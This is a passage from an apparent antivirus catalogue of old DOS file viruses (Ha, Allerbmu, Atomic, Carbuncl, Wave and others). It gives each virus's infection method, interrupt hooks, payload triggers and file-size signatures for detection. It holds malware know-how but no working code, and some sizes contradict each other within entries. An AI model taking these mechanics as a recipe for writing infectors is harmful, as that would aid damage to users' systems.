2) Before infecting files Drop will not hook INT 24h. The error
information will appear when I/O errors occur.
Damage: Refer to Execution Procedure 2).
Detection method: Detectable if the lengths of files increase
by 1130-1155 Bytes.
[Ha]
Virus Name: Ha
Virus Type: Parasitic Virus
Virus Length: Infected EXE file sizes increase by 1458-1468 Bytes
and COM files increase by 1462 Bytes.
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Detects whether it has resided in memory. If not, hooks INT
21h and resides in the highest memory, and then executes the
host program.
2) If it has already resided in the highest memory, the program
will be executed directly.
Infection Procedure: The virus infects files by AH=4B in INT 21h.
The uninfected files will be infected when they are executed.
Damage: None
Detection method: Detectable if the lengths of files increase by
1458-1468 Bytes.
[LCT]
Virus Name: Lct
Virus Type: Parasitic Virus
Virus Length: Infected COM file sizes increase by 599 Bytes
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a COM files in the current directory.
2) The virus checks whether the file is infected or not. If the
file has been infected, the virus continues to search until an
uninfected file is found and then infects it. The virus
stops searching until the last COM file in the current
directory is infected.
Damage: The virus checks the system date. If the date is "the
25th of Dec.", every time an infected file is executed, only
the virus codes in the infected file is executed. The program
then ends. The host programs are not executed.
Detection method: Detectable if the lengths of files increase
by 599 Bytes.
Remarks:
1) Non memory resident.
2) When infecting files, the virus does not hook INT 24h. And
the error information appears when I/O errors occur.
[NPOX-Var]
Virus Name: Npox-var
Virus Type: Parasitic Virus
Virus Length: Infected COM file sizes increase by 1000 Bytes
PC Vectors Hooked: None
Execution Procedure:
1) The virus searches for a COM file in the current directory.
2) The virus checks whether the file is infected. If the file has
been infected, the virus continues to search until an
uninfected file is found and then infects it. (The virus
only infects one file at a time.)
Damage: None
Detection method: Detectable if the lengths of files increase by
1000 Bytes.
Remarks:
1) Non memory resident.
2) When infecting files, the virus does not hook INT 24h. And
the error information appears when I/O errors occur.
3) The beginning of the virus is:
INC BX
PUSH AX
POP AX
DEC BX
JMP XXXX
[Bur-560h]
Virus Name: Bur-560h
Virus Type: Parasitic Virus
Virus Length: Infected COM files do not increase (Does not
infect EXE files).
PC Vectors Hooked: None
Execution Procedure:
1) The virus searches for COM files through the current path.
2) The virus checks whether the file is infected. If the file has
been infected, the virus continues to search until an
uninfected file is found and then infects it (It only infects
one file at a time).
Damage:
The virus infects the files by covering up the original files, so
the lengths of the files do not increase and the functions of the
original files can not be executed.
Remarks:
1) Non memory resident.
2) When infecting files, the virus does not hook INT 24h. And
the error information appears when I/O errors occur.
[Benoit]
Virus Name: Benoit
Virus Type: Parasitic Virus
Virus Length: Infected COM file sizes increase by 1183 bytes
(Does not infect EXE files).
PC Vectors Hooked: INT 21h
Execution Procedure:
1) After entering memory, it checks whether it resides in memory.
If not, the virus hooks INT 21h and resides in the high memory
and then runs the host program.
2) If the virus already resides in memory, the host programs will
be executed directly.
Infection Procedure:
1) Infects the file by "AH=4B" in INT 21h. When an uninfected
file is executed, it will be infected (Does not infect COM
files).
2) When infecting files, the virus does not hook INT 24h. The
error information will appear when I/O errors occur.
Damage: None
Detection method: Detectable when the lengths of files increase
by 1183 bytes.
[Hallo]
Virus Name: Hallo
Virus Type: Parasitic Virus
Virus Length: Infected COM file sizes increase by 496 Bytes.
(Does not infect EXE files.)
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a COM file in the current disk.
2) Checks whether the file is infected. If yes, continues to
search until an uninfected file is found and then infects it.
(only infects one file at a time). After the file is infected,
the virus displays
"I have got a virus for you!".
Damage: None
Detection method:
See if the string "I have got a virus for you!" displays when
executing programs and if the lengths of files increase by 599
Bytes.
Remarks:
1) Non memory resident.
2) When infecting files, the virus does not hook INT 24h. Error
message will appear when I/O errors occur.
[Allerbmu]
Virus Name: Allerbmu
Virus Type: Parasitic Virus
Virus Length: Infected COM file sizes increase by 359 Bytes.
(Does not infect EXE files.)
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a COM file in the current directory.
2) Checks whether the file is infected. If yes, the virus
continues to search.
3) If an uninfected file is found, the virus will proceed to
infect it. (The virus only infects one file at a time).
4) Checks the system date no matter whether an uninfected COM
file is found or not. When the date is 'Monday', the virus
destroys all files on the hard disk, and then displays the
following message:
"+ ALLERBMU NORI +(c) 1991........................"
Damage: Refer to Execution Procedure 4).
Detection method: Detectable if the lengths of files increase by
359 Bytes.
Remarks:
1) Non memory resident.
2) When infecting files, the virus does not hook INT 24h. Error
message will appear when I/O errors occur.
[Findm-608]
Virus Name: Findm-608
Virus Type: Parasitic Virus
Virus Length: Infected COM file sizes increase by 608-623 Bytes.
(Does not infect EXE files.)
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a COM file in the current directory.
2) Checks whether the file is infected. If yes, continues to
search until an uninfected file is found.
3) If an uninfected file is found, the virus will proceed to
infect it.
Damage: None
Detection method: Detectable if the lengths of files increase by
608-623 Bytes.
Remarks:
1) The part of infection of the virus was badly written. Most
of the infected files cannot be executed normally (also the
virus is not able to infect and damage).
2) Non memory resident.
3) When infecting files, the virus does not hook INT 24h. Error
message will appear when I/O errors occur.
[ARCV-2]
Virus Name: Arcv-2
Virus Type: Parasitic Virus
Virus Length: Infected EXE file sizes increase by 693 Bytes
(Does not infect COM files).
PC Vectors Hooked: INT 24h
Execution Procedure:
1) Searches for an EXE file in the current directory.
2) Checks whether the file is infected. If yes, the virus
continues to search.
3) If an uninfected file is found, the virus will proceed to
infect it (only infects one file at a time).
4) Whether an uninfected EXE file is found or not,
the virus will check the system date. When the date is
"April" or "the sixth of the month", the virus will display
"Help .. Help .. I'm Sinking ........"
on the screen.
Damage: None
Detection method: Detectable if the lengths of files increase by
693 Bytes.
Remarks:
1) The part of infection was badly written. Most of the
infected files cannot be executed normally (also the virus is
not able to infect and damage).
2) Non memory resident.
3) When infecting files, the virus does not hook INT 24h. Error
message will appear when I/O errors occur.
[Hallo-759]
Virus Name: Hallo-759
Virus Type: Parasitic Virus
Virus Length: Infected COM file sizes increase by 533 bytes
(Does not infect EXE files).
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a COM file in the current directory.
2) Checks whether the file is infected. If yes, continues to
search until an uninfected file is found and then infects it.
(only infects one file at a time). After infecting, the virus
displays the string:
"I have got a virus for you!".
Damage: None
Detection method: Detectable when the string "I have got a virus for
you!" is displayed when executing programs and if the lengths of
files increases by 759-775 Bytes.
Remarks:
1) The infection part was badly written. After the infected
files end, the system will hang.
2) Non memory resident.
3) When infecting files, the virus does not hook INT 24h. Error
message will appear when I/O errors occur.
[Atomic-2A]
Virus Name: Atomic-2a
Virus Type: Parasitic Virus
Virus Length: Infected COM file sizes increase by 350 Bytes
(Does not infect EXE files).
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a COM file in the current directory.
2) Checks whether the file is infected. If yes, continues to
search until an uninfected file is found and then infects it.
(only infects one file at a time.)
Damage: None
Detection method: Detectable if the lengths of files increase by
350 Bytes.
Remarks:
1) Non memory resident.
2) When infecting files, the virus does not hook INT 24h. Error
message will appear when I/O errors occur.
[Atomic-1B]
Virus Name: Atomic-1b
Virus Type: Parasitic Virus
Virus Length: The lengths of the infected COM files do not
increase (Does not infect EXE files.)
PC Vectors Hooked: None
Execution Procedure:
1) When the system date is the 1st, the virus will display
"The Atomic Dustbin--YOUR PHUCKED!"
The system then hangs.
2) When the system date is the 26th, the following message will
be displayed before the system hangs:
"The Atomic Dustbin 1B -- This is almost the second step !"
3) When the system date is neither the 1st nor the 26th:
i) the virus proceeds to search all COM files in the current
directory;
ii) checks whether the file is infected. If yes, continues to
search;
iii) if an uninfected file is found, proceeds to infect it.
(only infects two files at a time). After infecting,
displays "Program execution terminated."
Damage: None
Detection method: Detectable if the string "Program execution
terminated" is displayed when a program is executed.
Remarks:
1) Non memory resident.
2) When infecting files, the virus does not hook INT 24h. Error
message will appear when I/O errors occur.
[Atomic-1A]
Virus Name: Atomic-1A
Virus Type: Parasitic Virus
Virus Length: The lengths of the infected COM files do not
increase (Does not infect EXE files.)
PC Vectors Hooked: None
Execution Procedure:
1) When the system date is the 25th, the virus displays the
string "The Atomic Dustbin 1A -- This is almost the first step
!" and hangs the system.
2) When the system date is not the 25th:
i) it searches for a COM file in the current directory;
ii) checks whether the file is infected. If yes, continues to
search;
iii) if an uninfected file is found, the virus will proceed to
infect it (only infects two files at a time). After
infecting, displays the string "Bad command or file name".
Damage: None
Detection method: Detectable if the string "bad command or file name"
is displayed when a file is executed.
Remarks:
1) Non memory resident.
2) When infecting files, the virus does not hook INT 24h. Error
message will appear when I/O errors occur.
[Arusiek]
Virus Name: Arusiek
Virus Type: Parasitic Virus
Virus Length: Infected EXE and COM file sizes increase by 817
bytes.
PC Vectors Hooked: INT 21h and INT 24h
Execution Procedure:
1) Checks whether it already resides in the memory. If not, it
hooks INT 21h and implants itself in memory, and then executes
the host program.
2) If it already resides in memory, the host program will be
executed directly.
Infection Procedure:
1) Infects files by AH=4B in INT 21h. Uninfected files will be
infected when they are executed.
2) Before infecting files, the virus will hook INT 24h in order
to ignore I/O errors.
Damage: None
Detection method: Detectable if the lengths of files increase
by 817 bytes.
[Atas-3]
Virus Name: Atas-3
Virus Type: Parasitic Virus
Virus Length: Infected EXE and COM file sizes increase by 1268
bytes.
PC Vectors Hooked: INT 21h and INT 24h
Execution Procedure:
1) Checks whether it resides in the memory. If not, hooks INT
21h and implants itself in the memory, and then executes the
host program.
2) If it already resides in the memory, the host program will be
executed directly.
Infection Procedure:
1) Infects files by AH=4B in INT 21h. Uninfected files will be
infected when they are executed.
2) Before infecting files, the virus will hook INT 24h in order
to ignore I/O errors.
Damage: None
Detection method: Detectable if the lengths of files increase
by 1268 bytes.
[ARCV-570]
Virus Name: Arcv-570
Virus Type: Parasitic Virus
Virus Length: Infected EXE file sizes increase by 570-585 Bytes
(Does not infect COM files.)
PC Vectors Hooked: None
Execution Procedure:
1) Searches for an EXE file in the current directory.
2) Checks whether the file is infected. If yes, continues to
search until an uninfected file is found and then infects it
(only infects one file at a time).
Damage: None
Detection method: Detectable if the lengths of files increase by
570-585 Bytes.
Remarks:
1) Non memory resident.
2) When infecting files, it does not hook INT 24h. Error message
will appear when I/O errors occur.
[Atas-3215]
Virus Name: Atas-3215
Virus Type: Parasitic Virus.
Virus Length: About 3215 bytes (there are several variations.)
PC Vectors Hooked: INT 21h
Execution Procedure: (The virus only infects files in DOS 3.3)
1) Checks whether it resides in the memory. If not, hooks INT
21h and implants itself in the memory, and proceeds to execute
the original program.
2) If it already resides in the memory, the host program will be
executed directly.
Infection Procedure:
1) Infects files by AH=4B in INT 21h. Uninfected files will be
infected when they are executed.
[Andromda]
Virus Name: Andromda
Virus Type: Parasitic Virus
Virus Length: Infected COM files increase by 1140 Bytes
(Does not infect EXE files).
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a COM file in the current directory.
2) Checks whether the file is infected. If yes, continues to
search until an uninfected file is found.
3) Then infects it (only infects two files at a time.)
Damage: None
Detection method: Detectable if the lengths of files increase by
1140 Bytes.
Remarks:
1) Non memory resident.
2) When infecting files, the virus does not hook INT 24h. Error
message will appear when I/O errors occur.
[Grunt-529]
Virus Name: Grunt-529
Virus Type: Parasitic Virus
Virus Length: Infected COM files increase by 529 Bytes
(Does not infect EXE files).
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a COM file in the current directory.
2) Checks whether the file is infected. If yes, continues to
search.
3) If an uninfected file is found, infects it. (only infects one
file at a time.)
4) Checks the system date no matter an uninfected COM
file is found or not. If the date is Friday and it is after the
year 1993, the virus displays the following information on
the screen:
"Nothing like the smell of napalm in the morning!"
Damage: None
Detection method: Detectable if the lengths of files increase by
529 Bytes.
Remarks:
1) Non memory resident.
2) When infecting files, the virus does not hook INT 24h. Error
message will appear when I/O errors occur.
[Ein-Volk]
Virus Name: Ein-Volk
Virus Type: Parasitic Virus
Virus Length: Infected COM files increase by 482 Bytes
(Does not infect EXE files.)
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a COM file in the current directory.
2) Checks whether the file is infected. If yes, continues to
search.
3) If an uninfected file is found, proceeds to infect it. Does
not stop searching until all the COM files in the directory are
infected.
Damage: None
Detection method: Detectable if the lengths of files increase by
482 Bytes.
Remarks:
1) Non memory resident.
2) When infecting files, the virus does not hook INT 24h. Error
message will appear when I/O errors occur.
[DOS7]
Virus Name: Dos7
Virus Type: Parasitic Virus
Virus Length: Infected COM files increase by 342 Bytes
(Does not infect EXE files).
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a COM file in the current directory.
2) Checks whether the file is infected. If yes, it continues to
search.
3) If an uninfected file is found, the virus proceeds to infect
it (only infects one file at a time).
Damage: None
Detection method: Detectable if the lengths of files increase by
342 Bytes.
Remarks:
1) Non memory resident.
2) When infecting files, the virus does not hook INT 24h. Error
message will appear when I/O errors occur.
[Dooms-715]
Virus Name: Dooms-715
Virus Type: Parasitic Virus
Virus Length: Infected COM files increase by 715 Bytes
(Does not infect EXE files).
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a COM file in the root directory.
2) Checks whether the file is infected. If yes, continues to
search.
3) If an uninfected file is found, infects it (only infects one
file at a time).
Damage: None
Detection method: Detectable if the lengths of files increase by
715 Bytes.
Remarks:
1) Non memory resident.
2) When infecting files, the virus does not hook INT 24h. Error
message will appear when I/O errors occur.
[Dir-522]
Virus Name: Dir-522
Virus Type: Parasitic Virus
Virus Length: Infected COM files increase by 1268 bytes
(Does not infect EXE files).
PC Vectors Hooked: INT 21h and INT 24h
Execution Procedure:
1) Checks whether it resides in memory. If not, hooks INT 21h
and implants itself in memory, and then executes the host
program.
2) If it already resides in memory, the host program will be
executed directly.
Infection Procedure:
1) The virus infects files by "dir" command. When "dir" command
is executed, the virus searches for an uninfected file and
then infects it.
2) Before infecting files, the virus hooks INT 24h in order to
ignore I/O errors.
Damage: None
Detection method: Detectable if the lengths of files increase
by 522 bytes.
[Compan-83]
Virus Name: Compan-83
Virus Type: Parasitic Virus
Virus Length: 83 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks whether it resides in memory. If not, hooks INT 21h and
implants itself in memory, and then executes the host program.
2) If it already resides in memory, the program will be executed
directly.
Infection Procedure:
1) The virus infects files by AH=4B in INT 21h. When an infected
EXE file is executed, the virus will create a COM file with a
length of 83 bytes. The content of the COM file is the virus
itself (hidden file).
2) When infecting files, the virus does not hook INT 24h. Error
message will appear when I/O errors occur.
Damage: None
Detection method: Detectable if the file increases by 83 bytes.
[ChipShit]
Virus Name: Chipshit
Virus Type: Parasitic Virus
Virus Length: Infected COM files increase by 877 bytes
(Does not infect EXE files).
PC Vectors Hooked: None
Execution Procedure:
1) Checks the system date. If the date is later than Feb.
11, 1993, the virus displays the following information on the
screen:
"Hej! Tu wirus chipshit! Co........"
2) If the date is before Feb. 11, 1993:
a) Searches for a COM file in the current directory.
b) Checks whether the file is infected. If yes, it continues to
search.
c) If an uninfected file is found, it proceeds to infect it
(only infects one file at a time).
Damage: None
Detection method: Detectable if the lengths of files increase by
877 bytes.
Remarks:
1) Non memory resident.
2) When infecting files, the virus does not hook INT 24h. Error
message will appear when I/O errors occur.
[Carbuncl]
Virus Name: Carbuncl
Virus Type: Parasitic Virus
Virus Length: 622 bytes
PC Vectors Hooked: None
Execution Procedure:
1) With a 5/6 chance probability:
i) Searches for an EXE file in the current directory.
ii) Renames the file as *.crp, and then creates a *.bat
file with the following commands:
@ECHO OFF
CARBUNCL
RENAME JEXE.CRP JEXE.EXE
JEXE.EXE
RENAME JEXE.EXE JEXE.CRP
CARBBUNCL
(JEXE.EXE is the infected file, and CARBUNCL is the virus)
iii) Repeats the above procedure until all EXE files are
infected.
2) With a 1/6 chance probability: Infects five *.CRP files.
Damage: None
Detection method: Detectable if the lengths of files increase
by 877 bytes.
Remarks:
1) Non memory resident.
2) When infecting files, the virus does not hook INT 24h. Error
message will appear when I/O errors occur.
[VCL-2]
Virus Name: Vcl-2
Virus Type: Parasitic Virus
Virus Length: Infected COM files increase by 663 bytes
(Does not infect EXE files).
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a COM file in the current directory.
2) Checks if the file is infected. If yes, continues to search.
3) If an uninfected file is found, it proceeds to infect it
(only infects two files at a time).
Damage: None
Detection method: Infected files increase by 663 bytes
Remarks:
1) Non memory resident.
2) When infecting files, the virus does not hook INT 24h. Error
message will appear when I/O errors occur.
[Necro]
Virus Name: Necro
Virus Type: Parasitic Virus
Virus Length: Infected COM and EXE files increase by 696 bytes.
PC Vectors Hooked: None
Execution Procedure:
1) Searches for an uninfected COM/EXE file.
2) Checks if the file has been infected. If yes, continues to
search.
3) If an uninfected file is found, infects it (infects three
files at a time).
Damage: None
Detection method: Detectable if the files increase by 696 bytes
Remarks:
1) The infection part was badly written, so most of the infected
files can not execute (not able to infect and damage).
2) Non memory resident.
3) Before infecting files, the virus does not hook INT 24h.
Error message will appear when I/O errors occur.
[Eagl-7705]
Virus Name: Eagl-7705
Virus Type: Parasitic Virus
Virus Length: 7705 bytes
Execution Procedure:
1) Searches for an EXE file in the current directory.
2) Then creates a COM file with a length of 7705 bytes. The
contents of the COM file is the virus itself (hidden file).
3) Repeats the procedure until all EXE files in the current
directory are infected.
Damage: None
Detection method: Detectable if the lengths of files increase
by 7705 bytes.
Remarks: Non memory resident.
[Eno-2430]
Virus Name: Eno-2430
Virus Type: Parasitic Virus
Virus Length: Infected COM and EXE files increase by 2430-2445 bytes.
PC Vectors Hooked: INT 21h and INT 24h
Execution Procedure:
1) Checks if it resides in memory. If not, hooks INT 21h,
installs itself as memory resident and then executes the host
program.
2) If it already resides in memory, executes the host program
directly.
Infection Procedure:
1) The virus infects files by AH=4B in INT 21h. When an
uninfected program is executed, it becomes infected.
2) Before infecting files, Eno-2430 will hook INT 24h first to
ignore I/O errors.
Damage: The virus has a counter; after infecting a file, it
subtracts 1 from the counter. When the counter=0, the virus
will destroy all data on the hard disk.
Detection method: Detectable if the files increase by 2430-2445
bytes.
[Exper-755]
Virus Name: Exper-755
Virus Type: Parasitic Virus
Virus Length: Infected EXE files increase by 755 bytes
(Does not infect COM files).
PC Vectors Hooked: INT 24h
Execution Procedure:
1) Searches for an EXE file in the current directory.
2) Checks if the file is infected. If yes, continues to search.
3) If an uninfected file is found, proceeds to infect it. Does
not stop searching until all the COM files in the directory
are infected.
Damage: None
Detection method: Detectable if the files increase by 755 bytes.
Remarks:
1) Non memory resident.
2) Before infecting, the virus hooks INT 24h first to ignore I/O
errors.
[Findm-695]
Virus Name: Findm-695
Virus Type: Parasitic Virus
Virus Length: Infected COM files increase by 695-710 bytes
(Does not infect EXE files).
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a COM file in the current directory.
2) Checks if the file is infected. If yes, continues to search.
3) If an uninfected file is found, proceeds to infect it.
Damage: None
Detection method: Detectable if the files increase by 695-710
bytes.
Remarks:
1) The infection part of the virus was badly written. Most of
the infected files can not be executed normally (The virus is
not able to infect and damage).
2) Non memory resident.
3) When infecting files, the virus does not hook INT 24h. Error
message will appear when I/O errors occur.
[FR-1013]
Virus Name: FR-1013
Virus Type: Parasitic Virus
Virus Length: Infected EXE and COM files increase by 1013-1028 bytes.
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks if it resides in the memory. If not, hooks INT 21h,
installs itself as memory resident and then executes the
host program.
2) If it already resides in the memory, proceeds to execute the
host program directly.
Infection Procedure:
1) The virus infects files by AH=4B in INT 21h. When an
uninfected program is executed, it becomes infected.
2) When infecting files, the virus does not hook INT 24h. Error
message will appear when I/O errors occur.
Damage: None
Detection method: Detectable if the files increase by 1013-1028
bytes.
[Harm-1082]
Virus Name: Harm-1082
Virus Type: Parasitic Virus
Virus Length: Infected COM files increase by 1082-1097
bytes (Does not infect EXE files).
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks if it resides in the memory. If not, it hooks INT 21h,
installs itself as memory resident and then executes the host
program.
2) If it already resides in the memory, it proceeds to execute the
host program directly.
Infection Procedure: The virus infects files by AH=4B in INT 21h.
When an uninfected program is executed, it becomes infected.
Damage: None
Detection method: Detectable if the files increase by 1082-1097
bytes.
[Hor-2248]
Virus Name: Hor-2248
Virus Type: Parasitic Virus
Virus Length: Infected EXE and COM files increase by 2248
bytes.
PC Vectors Hooked: INT 21h and INT 24h
Execution Procedure: (The virus cannot run in DOS 5.0)
1) Checks if it resides in the memory. If not, it hooks INT 21h,
installs itself as memory resident and then executes the host
program.
2) If it already resides in the memory, it proceeds to execute the host
program directly.
Infection Procedure:
1) The virus infects files by AH=4B in INT 21h. When an
uninfected program is executed, it becomes infected.
2) Before infecting, the virus hooks INT 24h first to ignore I/O
errors.
Damage: None
Detection method: Detectable if the files increase by 2248
bytes.
[Encroach2]
Virus Name: Encroach2
Virus Type: Parasitic Virus
PC Vectors Hooked: INT 24h
Execution Procedure:
1) Searches for a COM file in the current directory.
2) Checks if the file is infected. If yes, it continues to search.
3) If an uninfected file is found, proceeds to infect it (infects
one file at a time).
Damage: None
Remarks:
1) Non memory resident.
2) Before infecting, the virus hooks INT 24h to ignore I/O errors.
[Encroach]
Virus Name: Encroach
Virus Type: Parasitic Virus
PC Vectors Hooked: INT 24h
Execution Procedure:
1) Searches for a COM file in the current directory.
2) Checks if the file is infected. If yes, it continues to search.
3) If an uninfected file is found, proceeds to infect it (infects
one file at a time).
Damage: None
Remarks:
1) Non memory resident.
2) Before infecting, the virus hooks INT 24h to ignore I/O errors.
[DWI]
Virus Name: Dwi
Virus Type: Parasitic Virus
Virus Length: Infected EXE files increase by 1050-1070
bytes (Does not infect COM files).
PC Vectors Hooked: INT 21h and INT 24h
Execution Procedure:
1) Checks if it resides in the memory. If not, it hooks INT 21h,
installs itself as memory resident and proceeds to execute the
host program.
2) If it already resides in the memory, it proceeds to execute the host
program directly.
Infection Procedure:
1) The virus infects files by AH=4B in INT 21h. When an
uninfected program is executed, it becomes infected.
2) Before infecting, the virus hooks INT 24h to ignore I/O errors.
Damage: None
Detection method: Detectable if the files increase by 1050-1070
bytes.
[Dennis]
Virus Name: Dennis (has at least two variations)
Virus Type: Parasitic Virus
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks if it resides in the memory. If not, it hooks INT 21h,
installs itself as memory resident and then executes the
host program.
2) If it already resides in the memory, it proceeds to execute the
host program directly.
Infection Procedure:
1) The virus infects files by AH=4B in INT 21h. When an
uninfected program is executed, it becomes infected.
2) When infecting files, Dennis does not hook INT 24h. Error
message will appear when I/O errors occur.
Damage: None
[Comsysexe]
Virus Name: Comsysexe (There are several variations)
Virus Type: Parasitic Virus
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks if it resides in the memory. If not, it hooks
INT 21h, installs itself as memory resident and
then executes the host program.
2) If it already resides in the memory, it proceeds to
execute the host program directly.
Infection Procedure:
1) The virus infects files by AH=4B in INT 21h.
When an uninfected program is executed, it
becomes infected. (infects EXE, COM and SYS
files)
2) When infecting files, Comsysexe does not hook
INT 24h. Error message will appear when I/O
errors occur.
Damage: None
[Cruncher]
Virus Name: Cruncher
Virus Type: Parasitic Virus
PC Vectors Hooked: INT 21h and INT 24h
Execution Procedure:
1) Check if it resides in memory. If not, it hooks INT 21h,
installs itself as memory resident and then executes the host
program.
2) If it already resides in memory, it proceeds to execute the host
program directly.
Infection Procedure:
1) The virus infects files by AH=4B in INT 21h. When an
uninfected program is executed, it becomes infected.
2) Before infecting files, the virus hooks INT 24h to ignore I/O
errors.
Damage: None
[Ice-159]
Virus Name: Ice-159
Virus Type: Parasitic Virus
Virus Length: Infected COM files increase by 159 bytes
(Does not infect EXE files).
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a COM file in the current directory.
2) Checks if the file is infected. If yes, it continues to search.
3) If an uninfected file is found, it proceeds to infect it (infects
one file at a time).
Damage: None
Detection method: Detectable if the files increase by 159 bytes.
Remarks:
1) Non memory resident.
2) When infecting files, the virus does not hook INT 24h. Error
messages will appear when I/O errors occur.
[Joker3]
Virus Name: Joker3
Virus Type: Parasitic Virus
Virus Length: Infected COM files increase by 1084 bytes
(Does not infect EXE files).
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks if it resides in the memory. If not, it hooks INT 21h,
installs itself as memory resident and then executes the host
program.
2) If it already resides in the memory, it proceeds to execute the
host program directly.
Infection Procedure: The virus infects files by INT 21h. When
INT 21h is executed, all the COM files in the current directory
will be infected. When infecting files, the virus does not hook
INT 24h. Error message will appear when I/O errors occur.
Damage: None
Detection method: Detectable if the files increase by 1084
bytes.
[Mi-Nazi]
Virus Name: Mi-Nazi
Virus Type: Parasitic Virus
Virus Length: Infected COM files increase by 1084 bytes
(Does not infect EXE files).
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Searches for a COM file in the current directory.
2) Checks if the file is infected. If yes, it continues to search.
3) If an uninfected file is found, it proceeds to infect it
(only infects one file at a time).
Damage: The part for virus infection was badly written. The
infected files cannot be executed normally (Furthermore, the
virus is not able to infect and damage).
Remarks:
1) The virus infects files by INT 21h. When INT 21h is executed,
all COM files in the current directory will be infected.
2) When infecting files, the virus does not hook INT 24h. Error
message will appear when I/O errors occur.
[Tiny-143]
Virus Name: Tiny-143
Virus Type: Memory Resident (OS), File Virus
Virus Length: Infected COM files increase by 143 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Searches for a COM file in the current directory.
2) Checks if the file is infected. If yes, it continues to search.
3) If an uninfected file is found, it proceeds to infect it
(only infects one file at a time).
Damage: None
Detection method:
1) Date and time fields of infected files are changed.
2) Infected files increase by 143 bytes.
[Smal-122B]
Virus Name: Smal-122B
Virus Type: Memory Resident(OS), File Virus
Virus Length: Infected COM and EXE files increase by 122 bytes.
PC Vectors Hooked: INT 21h
Execution Procedure: Checks whether it resides in the memory. If not,
the virus copies itself to absolute address 0000:0103h. Then hooks
INT21h and goes back to the original routine. If the program to be
executed is an uninfected COM or EXE file and its first byte is
not E9h, the virus proceeds to infect it.
Damage: EXE files are destroyed because of the subsequent head
damage.
Note: Some interrupts cannot run correctly because the virus has
stayed resident in the vector area.
Detection method:
1) Date and time fields of infected files are changed.
2) Infected files increase by 122 bytes.
[Printmon]
Virus Name: Printmon
Virus Type: File Virus
Virus Length: Infected COM files increase by 853 bytes.
PC Vectors Hooked: INT 17h (printing function) to change
print data.
Execution Procedure: Checks whether it has hooked INT 17h. If
not, virus makes some procedure of INT 17h to stay resident in
the memory. Then proceeds to infect all uninfected COM files with
length less than 64000 bytes on te current directory and goes back
to the original routine (During the infection period, it hangs INT
24h to prevent divulging its trace when writing).
Damage: The virus will cause some errors in the printed out data.
Note: Date and time fields of infected files are not change.
Detection method: Infected files will increase by 853 bytes.
[Tiny-124]
Virus Name: Tiny-124
Virus Type: Memory Resident(OS), File Virus
Virus Length: Infected COM files increase by 124 bytes.
PC Vectors Hooked: INT 21h
Execution Procedure: Checks whether it resides in the memory. If not,
the virus copies itself to absolute address 0050:0103h. Then hooks
INT21h and goes back to the original routine.
Infection Procedure: If the program to be executed is an uninfected
COM file and its first byte is not E9h, the virus proceeds to infect
it.
Damage: COM files are destroyed because of the subsequent head
damage.
Note: Some interrupts cannot run correctly because the virus has
stayed resident in the vector area.
Detection method:
1) Date and time fields of infected files are changed.
2) Infected files increase by 124 bytes.
[Smal-124]
Virus Name: Smal-124
Virus Type: Memory Resident(OS), File Virus
Virus Length: Infected COM files increase by 124 bytes
PC Vectors Hooked: INT 21h
Execution Procedure: Checks whether it is residing in the memory. If
not, it copies itself to absolute address 0050:0103h. Then hooks
INT21h and goes back to the original routine.
Infection Procedure: If the program to be executed is an
uninfected COM file, the virus proceeds to infect it.
Damage: None
Note: Some interrupts cannot run correctly because the virus has
stayed resident in the vector area.
Detection method:
1) Date and time fields of infected files are changed.
2) Infected files increase by 124 bytes.
[Troi2]
Virus Name: Troi2
Virus Type: Memory Resident(OS), File Virus
Virus Length: Infected EXE files increase by 512 bytes.
PC Vectors Hooked: INT 21h
Execution Procedure: Checks whether the current date is before
5/1/1992. If it is, it returns to the original routine directly.
Otherwise, checks whether it is residing in the memory. If not,
the virus copies itself to absolute address 0000:0200h (The area
for interrupts vectors), hooks INT 21h and goes back to the original
routine.
Infection Procedure:
1) Hooks INT 21h to check whether it is residing in the memory.
2) Hooks INT 21H (AH=4Bh) to infect files. If the program to be
executed is an uninfected EXE file, the virus proceeds to infect
it.
Damage: None
Note: Date and time fields of infected files are not change.
Detection method: Infected files increase by 512 bytes.
[Tver]
Virus Name: Tver
Virus Type: Memory Resident(OS), File Virus
Virus Length: Infected COM files increase by 308 bytes.
PC Vectors Hooked: INT 21h
Execution Procedure:
Checks whether it is residing in the memory. If not, the virus
copies itself to absolute address 0000:0200h (the area for interrupt
vectors), hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21h to check whether it is residing in the memory.
2) Hooks INT 21H (AH=4Bh) to infect files. If the program to be
executed is an uninfected COM file and its first byte is E9h,
the virus proceeds to infect it.
Damage: None
Note: Many virus files' first byte is E9h. In most cases, the virus
corrects the files' first byte if it is not E9h.
Detection method:
1) Date and time fields of infected files are changed.
2) Infected files increase by 308 bytes.
[Wave]
Virus Name: Wave
Virus Type: Memory Resident(OS), File Virus
Virus Length: Infected COM files increase by 454 bytes.
PC Vectors Hooked: INT 21h, 1Ch
Execution Procedure: Checks whether it is residing in the memory. If
not, the virus copies itself to absolute address 0000:01ECh (the area
for interrupt vectors), hooks INT 21h and INT 1Ch, changes the
pointer of INT 78h to the address pointed by the original INT
21h. Then goes back to the original routine.
Infection Procedure:
INT 21h:
1) Hooks INT 21h to check whether it remains in the memory.
2) Hooks INT 21h (AH=4Bh,AH=3Dh) to infect files. If the program
to be executed is an uninfected COM, and the combined length of
the program and the virus is between 1500 and 64000 bytes and it
is on C drive (except A and B drive), then the virus will proceed to
